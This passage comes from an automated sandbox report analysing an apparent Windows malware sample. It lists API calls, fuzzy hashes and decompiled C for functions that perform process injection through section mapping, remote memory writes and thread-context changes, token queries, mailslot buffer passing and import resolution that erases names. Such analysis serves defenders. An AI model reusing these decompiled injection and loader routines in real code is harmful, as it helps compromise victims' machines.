    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E4003, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105 Total matches: 5memorystring
Similarity
  • Total matches: 5
  • API ID: VirtualAllocVirtualFreelstrcpynmemcpy
  • String ID: Apr 14 2018$pnls$pnls
  • API String ID: 1980370899-1480254790
  • Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
  • Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
  • Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
  • Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
APIs
  • lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
  • memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
